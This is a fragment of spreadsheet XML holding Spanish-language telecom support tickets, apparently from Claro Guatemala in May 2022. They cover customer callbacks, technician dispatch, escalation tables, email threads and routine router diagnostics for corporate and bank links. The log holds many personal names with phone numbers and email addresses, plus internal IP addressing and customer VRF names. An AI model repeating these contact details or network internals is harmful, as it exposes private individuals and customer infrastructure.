REDIRECT:0
9818-886C-0E2D
CISCO MERAKI</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SR. ERICK CIPICEN 58861282 SOLICITA REALIZAR PRUEBAS CON SOC, INFORMA QUE EL PUNTO REMOTO AUN NO TIENEN CONEXION, ESTIMADOS SOC LLAMAR A CLIENTE EN 15 MINS REALIZARA PRUEBAS DE REINICIO, GRACIAS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JOSE BOLAÑOS 59852965 NO CONTESTA IVR ENVIA A BUZON, ID: 2001723803.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ERICK CIPICEN 58861282 ACTUALMENTE EN LLAMADA...</t>
  </si>
  <si>
    <t>F4581437</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE MARIA EN PUNTO REMOTO QUIEN INDICA QUE HOY SI ESPERARAN A LOS TÉCNICOS YA QUE LES URGE SERVICIO, SI ESPERAN LAS 2 HORAS A QUE LLEGUEN TECNICOS Y A QUE REPAREN SERVICIO
2001776749
COLA:
NOMBRE: DE: 48288569
NÚMERO: 48288569
DURACIÓN: 0:10:20
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 48288569
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 28/05/2022 11:50:30</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EN PR CONTACTO EN SITIO:	MARIA JUNGLES 48288569 ENTERADA Y SOLICITA VISITA PARA LUNES, ADICIONAL SOLICITA DATOS DE TECNICOS VIA CORREO
2001762324
COLA:
NOMBRE: A: 48288569
NÚMERO: 48288569
DURACIÓN: 0:02:00
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 48288569
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 28/05/2022 10:49:57</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ISRAEL GONZÁLEZ/CLIENTE, SE INDICA QUE SE COORDINA VISITA TÉCNICA HASTA EL DÍA LUNES A LAS 08:00AM A SOLICITUD DE PR.</t>
  </si>
  <si>
    <t>F4581453</t>
  </si>
  <si>
    <t>ENLACE UP POR WA, SEGUIMIENTO HASTA EL DÍA LUNES CON SUPERVISOR REGIÓN PARA CONSEGUIR ROUTER SERIE 1900, SEGUIMIENTO HASTA ESE DÍA A PARTIR DE LAS 08:00AM</t>
  </si>
  <si>
    <t>F4581486</t>
  </si>
  <si>
    <t xml:space="preserve">  ##1/3	MAUDIEL QUINTANILLA	78680025	30 MIN	10:30:00
COMENTARIO: CONFIRMA DE ENTERADO CONTINUA CON SEGUIEMIENTO, ID: 2001758205.</t>
  </si>
  <si>
    <t>F4581495</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS RODRIGUEZ 41524566 MENCIONA QUE PRESENTAN SATURACION EN EL HORARIO DE  18:00 A 22:00 POR LO QUE INDICA ESTARA ENVIANDO POR CORREO LAS PRUEBAS
CLIENTE SOLICITA SE PUEDA COMPARTIR LAS PRUEBAS REALIZADAS EN DICHO HORARIO
-ID 3001109267</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE EL PROBLEMA SE DA ENTRE LAS 18:00/22 HORAS, ÉL ESTARÁ ENVIANDO SUS PRUEBAS INTERNAS; ADICIONAL PIDE QUE DE PARTE DE GESTIÓN N1 SE VERIFIQUE EL COMPORTAMIENTO DEL SERVICIO A TAL HORA Y ENVIARLE TAMBIÉN PRUEBAS.
CORREO DE CLIENTE JUANCARLOS339J1@GMAIL.COM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN CARLOS RODRIGUEZ AL 41524566   NO RESPONDE || SE INTENTARA LUEGO **
ID 3001097125
**</t>
  </si>
  <si>
    <t>F4581504</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE WALTER MEDINA 41764970, SE LE SOLICITA SU APOYO PARA UBICAR SU PLANTA PBX</t>
  </si>
  <si>
    <t>CLIENTE REINICIA SU PLANTA PBX NEC Y EL EQUIPO AETHRA PERO EL INCONVENIENTE PERSISTE, SOLICITA VISITA TÉCNICA</t>
  </si>
  <si>
    <t>F4581509</t>
  </si>
  <si>
    <t>SE PLATICA CON TECNICO LUIS ANTONIO QUIEN INDICA QUE ESTA A MA DE 1 HORA DE CLIENTE SE LE BRINDA EL NUMERO DEL CLIENTE PARA QUE LE PLATIQUE Y ACUERDEN HORARIO PARA VISITA</t>
  </si>
  <si>
    <t>SE COORDINARÁ VISITA TÉCNICA A CLIENTE PARA REVISIONES FÍSICAS DE EQUIPOS; ADICIONAL SE LLAMÓ A CLIENTE 40713166 PARA BRINDARLE AVANCES DEL TICKET, NO CONTESTA.</t>
  </si>
  <si>
    <t>F4581523</t>
  </si>
  <si>
    <t>SE ENVIA CORREO
SOLICITANDO ACCESOS A PERSONA TECNICO</t>
  </si>
  <si>
    <t>NO SE TIENE RESPUESTA DE EQUIPO DEL SIGUIENTE SALTO EN LAN DE CLEINTE EL CUEL RECIBE SUBINTERFACE SE VEN OTRAS VLAN ACIVAS PERO ACTUALMENTE LA DE AZTECA NO TIENE MATCH EN LAN
CSC3945_MEGAMALL_SAN46-SAN14#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.2.127.65             5   084F.0AC8.6590  ARPA   GIGABITETHERNET0/1.3812
INTERNET  10.2.127.66             -   380E.4D91.CE81  ARPA   GIGABITETHERNET0/1.3812
INTERNET  10.2.127.70             -   380E.4D91.CE82  ARPA   GIGABITETHERNET0/2.3813
INTERNET  10.2.129.97             -   380E.4D91.CE80  ARPA   GIGABITETHERNET0/0.2509
INTERNET  10.2.129.98             0   INCOMPLETE      ARPA
INTERNET  10.2.133.37             -   380E.4D91.CE80  ARPA   GIGABITETHERNET0/0.2511
INTERNET  10.2.133.38           221   6C31.0EB4.0200  ARPA   GIGABITETHERNET0/0.2511
INTERNET  10.2.137.157            -   380E.4D91.CE80  ARPA   GIGABITETHERNET0/0.2513
INTERNET  10.2.137.158            0   INCOMPLETE      ARPA
INTERNET  10.2.137.229            -   380E.4D91.CE80  ARPA   GIGABITETHERNET0/0.2514
INTERNET  10.2.137.230            9   FC73.FB3A.86A9  ARPA   GIGABITETHERNET0/0.2514
INTERNET  181.115.44.249          -   380E.4D91.CE80  ARPA   GIGABITETHERNET0/0.2500
INTERNET  181.115.44.250          0   E0CB.BC19.F15B  ARPA   GIGABITETHERNET0/0.2500
INTERNET  181.115.48.9            -   380E.4D91.CE80  ARPA   GIGABITETHERNET0/0.2507
INTERNET  181.115.48.10           0   0C8D.DBBE.E311  ARPA   GIGABITETHERNET0/0.2507
CSC3945_MEGAMALL_SAN46-SAN14#SHO INTE
CSC3945_MEGAMALL_SAN46-SAN14#SHO INTERFACES  GI
CSC3945_MEGAMALL_SAN46-SAN14#SHO INTERFACES  GIGABITETHERNET 0/0.2512
GIGABITETHERNET0/0.2512 IS UP, LINE PROTOCOL IS UP
  HARDWARE IS PQ3_TSEC, ADDRESS IS 380E.4D91.CE80 (BIA 380E.4D91.CE80)
  DESCRIPTION: 1729792_IN15MB_BAZ_MEGAMALL
  INTERNET ADDRESS IS 10.2.137.153/30
  MTU 1500 BYTES, BW 1000000 KBIT/SEC, DLY 10 USEC,
     RELIABILITY 255/255, TXLOAD 3/255, RXLOAD 1/255
  ENCAPSULATION 802.1Q VIRTUAL LAN, VLAN ID  2512.
  ARP TYPE: ARPA, ARP TIMEOUT 04:00:00
  KEEPALIVE SET (10 SEC)
  LAST CLEARING OF "SHOW INTERFACE" COUNTERS NEVER
CSC3945_MEGAMALL_SAN46-SAN14#SHO RUN INTERFACES  GIGABITETHERNET 0/0.2512
                                              ^
% INVALID INPUT DETECTED AT '^' MARKER.
CSC3945_MEGAMALL_SAN46-SAN14#SHO RUN INTERFACE  GIGABITETHERNET 0/0.2512
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 260 BYTES
!
INTERFACE GIGABITETHERNET0/0.2512
 DESCRIPTION 1729792_IN15MB_BAZ_MEGAMALL
 ENCAPSULATION DOT1Q 2512
 IP VRF FORWARDING BANCO_AZTECA
 IP ADDRESS 10.2.137.153 255.255.255.252
 SERVICE-POLICY INPUT SERVICIOS_15MBPS
 SERVICE-POLICY OUTPUT SERVICIOS_15MBPS
END
CSC3945_MEGAMALL_SAN46-SAN14#PING VR
CSC3945_MEGAMALL_SAN46-SAN14#PING VRF BANCO_AZTECA 10.2.137.154
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 10.2.137.154, TIMEOUT IS 2 SECONDS:
.....</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCO ANTONIO 99202007 MENCIONA QUE OBSERVA EL SERVICIO CAIDO, SE LE SOLICITA PUEDA COMPARTIR LAS PRUEBAS POR CORREO PERO CLIENTE SE NIEGA EN PODER APOYAR
-ID 2001970431</t>
  </si>
  <si>
    <t>EL INCONVENIEENTE SE PRESENTA DEL LADO LAN
&lt;CSPSHNPPN1D1EIM3&gt;PING -C 1500 -M 30 -B -VPN-INSTANCE BANCO_AZTECA 10.2.137.153
  PING 10.2.137.153: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.2.137.153 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/40 MS
&lt;CSPSHNPPN1D1EIM3&gt;</t>
  </si>
  <si>
    <t>F4581547</t>
  </si>
  <si>
    <t>***--- SE LLAMA A EDGAR MARTINEZ 34841978 (CLIENTE) NO CONTESTA POR LO QUE SE DEBE LLAMAR LUEGO *--*
2001868536</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDGAR JOSÉ MARTINEZ  AL 34841978 NO RESPONDE ENVIA A BUZON ||
 SE INTENTARA LUEGO **
ID 3001377165
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDGAR JOSÉ MARTINEZ  AL 34841978 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001364226 - 3001364734
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDGAR JOSE  QUIEN BRINDA LOS DATOS  DE LA UBICACIÓN DE CLAIENTE TORRE 1 NIVEL 16 PREGUNTAR AXEL BACK
2001974370
COLA:
NOMBRE: A: 34841978
NÚMERO: 34841978
DURACIÓN: 0:01:06
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 34841978
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 30/05/2022 08:34:49</t>
  </si>
  <si>
    <t>F4581558</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVER AYALA 72779258  MENCIONA QUE SIGUE PRESENTANDO PROBLEMA CON EL ANCHO DE BANDA
DESCARGA - 8.85
SUBIDA - 4.60
-ID 2001972348</t>
  </si>
  <si>
    <t>F4581561</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA MAIL AL CLIENTE NOTIFICANDO LA ALARMA
DE: BARBARA ISABEL APARICIO MORALES &lt;BARBARA.APARICIO@CLARO.COM.GT&gt;ENVIADO: SÁBADO, 28 DE MAYO DE 2022 11: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375
ESTIMADO CLIENTE,
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1561
ID: 47501775T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1375
UBICADO EN: CAJERO 1375 MUNICIPALIDAD SAN JUAN COTZAL, CANTON TZIKALLIBAL SAN JUAN COTZAL, EDIF. MUNICIPAL, QUICHE
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4581602</t>
  </si>
  <si>
    <t>F4581619</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  HELEN FERNANDEZ 42484009 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001974674</t>
  </si>
  <si>
    <t>F4581621</t>
  </si>
  <si>
    <t>*-* SE LLAMA A CLIENTE JUAN GARZARO  AL 41964838  INDICA QUE TIENE PROBLEMAS DE VELOCIDAD || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON GESTOR **
ID 3001123527
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN GARZARO 41964838  PARA SOLICITAR DATOS DE VISITA SI FUESE NECESARIO LLEGAR A PR
-ID 3001263275
NOMBRE DEL CLIENTE: MEGA MATERIALES DE ANTIGUA S.A.
UBICACIÓN:CARRETERA A CIUDAD VIEJA ANTIGUA GUATEMALA SACATEPEQUEZ
CONTACTO EN SITIO: JUAN GARZARO 41964838
HORARIO DE ATENCION:SI ES NECESARIO LLEGAR A PR LLAMAR 30 MIN ANTES A CLIENTE JUAN GARZARO 41964838
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN GARZARO 41964838  NO RESPONDE, SE INTENTARA LUEGO **
ID 3001029543
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN GARZARO 41964838 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001700173</t>
  </si>
  <si>
    <t>F4581636</t>
  </si>
  <si>
    <t>BYRON ESCOBAR/CLIENTE CONSULTA SEGUIMIENTO, SE ESTABA VERIFICANDO SEGUIMIENTO Y CORTA LA LLAMADA; SE ESCALA CON JUAN RODRÍGUEZ/TÉCNICO 58269660 INDICA QUE ESTA EN TRIPARTITA CON GESTOR ASIGNADO, TÉCNICO YA ESTÁ EN PR, A LA ESPERA QUE AUTORICE EL INGRESO.</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON BYRON ESCOBAR/CLIENTE 59496106 Y SE LE INDICA QUE YA TÉCNICO ESTÁ EN PR; ASÍ LO CONFIRMA, EN ESTE MOMENTO GESTIONARÁ EL INGRESO ASEGURA.</t>
  </si>
  <si>
    <t>F4581641</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ENCARGADA / O DE LUGAR 45977605 NO CONTESTO IVR ENVIA A BUZON, ID: 2001795643, SE NECESITA SOLICITAR MAS INFORMACION Y FOTOGRAFIAS DEL EQUIPO EN SITIO PARA VALIDAR SI ES UN ENLACE CORPORATIVO Y TURBONETT.</t>
  </si>
  <si>
    <t>F4581652</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81652
ID:  61200231T
IDENTIFICADOR DEL CLIENTE:  CC_DISTELSA_GT_VISTRALES
UBICADO EN:    50259784752_CENTRO COMERCIAL VISTARES ,DIAGONAL 19 36-01 ZONA 12 ,KIOSCO K2-23 GUATEMALAGUATEMALA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4581678</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. WALTER ANIBAL TUY INFORMA QUE LA AGENCIA SE ENCUENTRA ADENTRO DE LA UNIVERDIDAD Y AUN NO HAY PERSONAL ATENDIENDO ESTA SITIO DESDE QUE SE CERRO POR LA PANDEMIA, POSIBLEMENTE PERSONAL DE LA UNIVERSIDAD APAGO LOS EQUIPOS O NO HAY ENERGIA COMERCIAL EN EL SITIO, AUTORIZA CIERRE DEL INCIDENTE,  ID: 2001831263</t>
  </si>
  <si>
    <t>F4581757</t>
  </si>
  <si>
    <t xml:space="preserve"> SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
SÁB 28/05/2022 3:12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_0530¿¿¿¿¿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1757¿¿
ID: 806300094T¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM_0530
UBICADO EN:
(ATM 530) DIRECCION GENERAL DE EDUCIACION FISICA, ZONA 11 - 32 CALLE 9-10 Z. 11 COLONIA GRANAI TOWNSDE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4581767</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1767
ID: 625900244T
IDENTIFICADOR DEL CLIENTE: CC_CAMPERO_GT_C682
UBICADO EN:  682, 5ª CALLE 9-55 ZONA 2 CANTÓN MORAZÁN CENTRO COMERCIAL LA TRINIDAD LOCAL FC-3 MALACATÁN SAN MARCO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4581802</t>
  </si>
  <si>
    <t>SE HABLÓ CON STEVEN MÁRQUEZ/CLIENTE 22437253 INDICA ENLACE OK, PIDE SE MANTENGA SERVICIO EN MONITOREO PARA LAS 22:00 HORAS DE HOY.</t>
  </si>
  <si>
    <t>F4581810</t>
  </si>
  <si>
    <t>SE LLAMA A SUPERVISOR SIN TENER RESPUESTA SE INTENTARA NUEVAMENTE</t>
  </si>
  <si>
    <t>SE CONTACTA  A CLIENTE 55583165 CRISTIAN RUEDA SE LE INDICA EL TIEMPO ESTIMADO DE LLEGADA DE LOS TECNICOS, CLIENTE INDICA QUE SE PROGRAME PARA EL DIA DE MAÑANA LA VISITA.
55583165</t>
  </si>
  <si>
    <t>SE CORRIGE TABLA DE ESCALACION
TABLA DE ESCALAMIENTO REGION METRO PLANTA INTERNA 				
	WO OPEN                        			7:05
1/4	OSCAR CASTILLO	58261583	2 HORAS	9:05:00
2/4	EDGAR WIRTZ	55551962	3 HORAS	10:05:00
3/4	FABRICIO RAMIREZ		5 HORAS	12:05:00
4/4	RODOLFO MORALES	58261609	6 HORAS	13:05:00</t>
  </si>
  <si>
    <t xml:space="preserve">	WO OPEN                        		&lt;&lt;	7:05
1/4	ELMER FLORES	58260888		9:05:00
2/4	ALDO DIAZ	58261057	3 HORAS	10:05:00
3/4	RENE AGUSTIN	58261183	5 HORAS	12:05:00
4/4	RODOLFO MORALES	58261609	6 HORAS	14:51:00</t>
  </si>
  <si>
    <t>TECNICOS EN SITIO  REALIZANDO PRUEBAS CON TECNICOS DE RADIOS CAMBIUM, SE CONFIGURA EQUIPO REINICIANDO DE FABRICA, AL CONFIGURAR NUEVAMTE PIERDE LA CONFIG NO GUARDA CAMBIOS, SE DESCARTARAN IPS PARA VALIDAR
TECNICO OSCAR ORDOÑES 58269787</t>
  </si>
  <si>
    <t>ES NECESARIO REINICIAR EQUIPOS CAMBIUM EN NODO YA QUE NO SE LOGRA REGISTRAR ANTENA</t>
  </si>
  <si>
    <t>***--- SE RETROALIMENTA A LA CENTRAL INDICANDO DE LA VISITA COORDINADA CON PR --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: DOMINGO, 29 DE MAYO DE 2022 04:19
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;
ASUNTO: RE: G435 SERVICIO APN CLARO LÍNEA 34049817 ID 38300700T
ESTIMADO SR. REYES.
                RESPECTO SU SOLICITUD, EL COMPAÑERO DIEGO INGRESO EL TICKET SD1130038 PARA EL ID 829800073.
PERSONALA CARGO NOS INDICA QUE SE ACORDO CON EL PERSONAL DEL PUNTO DE VENTA REALIZAR VISITA TÉCNICA EL DÍA DE HOY POR LA MAÑANA.
ESPERAMOS COMPARTIR MAS AVANCES A LA BREVEDAD POSIBLE EN EL MOMENTO DE LA VISITA.
SALUDOS.
DE: WALTER ANIBAL REYES [MAILTO:WALTER.REYES@SOMOSCMI.COM]
ENVIADO EL: DOMINGO, 29 DE MAYO DE 2022 04:09
PARA: PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;
ASUNTO: RE: G435 SERVICIO APN CLARO LÍNEA 34049817 ID 38300700T
IMPORTANCIA: ALTA
BUEN DÍA, FAVOR SU APOYO URGENTE AUN SE TIENE FUERA DE LÍNEA EL SERVICIO Y NO SE HAN RECIBIDO AVANCES POR PARTE DE USTEDES.
EN COMUNICACIÓN SOSTENIDA CON DIEGO SE ACORDÓ TRABAJAR VÍA EL ID 829800073, COMPARTIR AVANCES.
SALUDOS,</t>
  </si>
  <si>
    <t>SE PLATICA CON TECNICO NUEVAMENTE INDICANDO QUE SE TIENE RESPUESTA DE EQUIPOS CAMBIUN EN CLIENTE , AHORA PEDIRAN SOPORTE PARA REVISION DE EQUIPOS L3 EN CLIENTE</t>
  </si>
  <si>
    <t>SE TIENE REAPUESTA DE EQUIPO CAMBIUM DE CLIENTE
&lt;OBARGTBAN1T1D04A03EIM3&gt;PING -C 1500 -VPN-INSTANCE GESTOR_CAMBIUM 10.105.93.165
  PING 10.105.93.165: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.105.93.165: BYTES=56 SEQUENCE=1 TTL=64 TIME=9 MS
    REPLY FROM 10.105.93.165: BYTES=56 SEQUENCE=2 TTL=64 TIME=18 MS
    REPLY FROM 10.105.93.165: BYTES=56 SEQUENCE=3 TTL=64 TIME=20 MS
    REPLY FROM 10.105.93.165: BYTES=56 SEQUENCE=4 TTL=64 TIME=28 MS
    REPLY FROM 10.105.93.165: BYTES=56 SEQUENCE=5 TTL=64 TIME=8 MS
  --- 10.105.93.165 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 8/16/28 MS
&lt;OBARGTBAN1T1D04A03EIM3&gt;PING -C 1500 -M 30 -B -VPN-INSTANCE GESTOR_CAMBIUM 10.105.93.165
  PING 10.105.93.165: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.105.93.165 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 4/10/44 MS
&lt;OBARGTBAN1T1D04A03EIM3&gt;</t>
  </si>
  <si>
    <t>--- ESTEFANY ROLDAN, INDICA QUE ESCALARON CON LA PERSONA QUE ESTA DANDO SEGUIMIENTO PARA LA ACTUALIZACION. ...
RESULTADO: LLAMADA HECHA
NOMBRE: CCR -GT -
NÚMERO: 24206289
INICIO: HOY, 09:54
FIN: HOY, 09:55
DURACIÓN: 0:51
ID DE LLAMADA: 2001884358
...</t>
  </si>
  <si>
    <t>--- SE LLAMA A CCR PARA SOLICITAR AVANCES. ...</t>
  </si>
  <si>
